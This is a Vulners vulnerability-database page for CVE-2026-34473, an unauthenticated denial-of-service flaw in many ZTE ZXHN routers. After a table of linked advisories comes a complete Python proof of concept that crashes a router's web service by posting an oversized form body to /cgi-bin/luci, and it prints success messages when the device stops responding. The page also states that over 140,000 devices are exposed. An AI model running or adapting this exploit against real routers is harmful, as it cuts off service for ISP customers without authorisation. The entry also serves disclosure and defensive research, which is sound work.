Vulners
Lucene search
ZTE Routers - Unauthenticated Denial of Service
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2026-34473 | 6 May 202600:00 | – | attackerkb |
 | CVE-2026-34473 | 27 Mar 202623:26 | – | circl |
 | ZTE多款产品 资源管理错误漏洞 | 6 May 202600:00 | – | cnnvd |
 | CVE-2026-34473 | 6 May 202600:00 | – | cve |
 | CVE-2026-34473 | 6 May 202600:00 | – | cvelist |
 | EUVD-2026-27881 | 6 May 202621:31 | – | euvd |
 | CVE-2026-34473 | 6 May 202619:16 | – | nvd |
 | 📄 ZTE Unauthenticated Denial of Service | 20 May 202600:00 | – | packetstorm |
| 📄 ZTE ZXHN Router Denial of Service | 26 May 202600:00 | – | packetstorm |
 | PT-2026-38217 | 6 May 202600:00 | – | ptsecurity |
10
# Exploit Title: ZTE Routers - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed
devices
# CVE: CVE-2026-34473
# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473
# PoC (Python 3)
import requests
import sys
def dos_exploit(target, size_kb=256):
"""
CVE-2026-34473 - Unauthenticated DoS
Sends oversized POST body to crash ZTE CGILua web service.
"""
url = f"http://{target}/cgi-bin/luci"
payload = "a=" + "A" * (size_kb * 1024)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
r = requests.post(url, data=payload, headers=headers, timeout=15)
print(f"[+] {target} responded with HTTP {r.status_code} (device
may still be up)")
except requests.exceptions.ConnectionError:
print(f"[!] {target} - Connection refused or dropped: device web
service likely crashed (DoS successful)")
except requests.exceptions.Timeout:
print(f"[!] {target} - Timeout: device web service unresponsive
(DoS successful)")
except Exception as e:
print(f"[-] {target}: {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: poc.py <target_ip> [payload_size_kb]")
sys.exit(1)
size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
dos_exploit(sys.argv[1], size)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.02376
SSVC